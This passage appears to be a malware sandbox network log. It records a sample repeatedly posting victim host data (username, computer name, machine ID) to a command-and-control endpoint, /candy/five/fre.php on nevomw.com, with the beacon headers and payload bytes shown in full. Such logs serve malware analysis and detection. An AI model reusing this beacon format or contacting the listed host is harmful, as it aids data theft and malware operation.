                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:31.580452919 CET1687OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:31.656363010 CET1687INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            24192.168.2.64974045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:53.327474117 CET166OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:53.382477999 CET166OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:53.459325075 CET167INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            240192.168.2.64999045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:31.972079992 CET1688OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:32.023840904 CET1688OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:32.100903034 CET1689INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            241192.168.2.64999145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:32.430896997 CET1690OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:32.483166933 CET1690OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:32.565126896 CET1690INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            242192.168.2.64999245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:32.886878967 CET1691OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:32.939291000 CET1691OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:33.011949062 CET1692INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            243192.168.2.64999345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:33.320496082 CET1693OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:33.374996901 CET1693OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:33.450376034 CET1693INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            244192.168.2.64999445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:33.753309965 CET1694OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:33.805074930 CET1694OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:33.881656885 CET1695INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            25192.168.2.64974145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:53.777770042 CET167OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:53.830080032 CET168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:53.903446913 CET168INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            26192.168.2.64974245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:54.204572916 CET169OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:54.261811972 CET169OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:54.341794968 CET170INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            27192.168.2.64974345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:54.660317898 CET171OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:54.712184906 CET171OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:54.786220074 CET171INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            28192.168.2.64974445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:55.114402056 CET172OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:55.168152094 CET172OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:55.244730949 CET173INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            29192.168.2.64974545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:55.544487000 CET173OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:55.596440077 CET174OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:55.674252987 CET174INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.64971545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:42.691672087 CET61OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:42.744729996 CET61OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:42.818738937 CET62INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            30192.168.2.64974645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:55.981451988 CET175OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:56.053913116 CET175OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:56.194096088 CET176INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            31192.168.2.64974745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:56.489115000 CET176OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:56.541968107 CET177OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:56.615647078 CET177INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            32192.168.2.64974845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:56.856209993 CET178OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:56.909864902 CET178OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:56.986978054 CET178INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            33192.168.2.64974945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:57.268927097 CET179OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:57.323098898 CET180OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:57.405086040 CET180INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            34192.168.2.64975045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:57.744998932 CET181OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:57.804277897 CET181OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:57.883454084 CET181INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            35192.168.2.64975145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:58.120465994 CET182OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:58.173096895 CET182OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:58.247212887 CET183INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            36192.168.2.64975245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:58.573098898 CET184OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
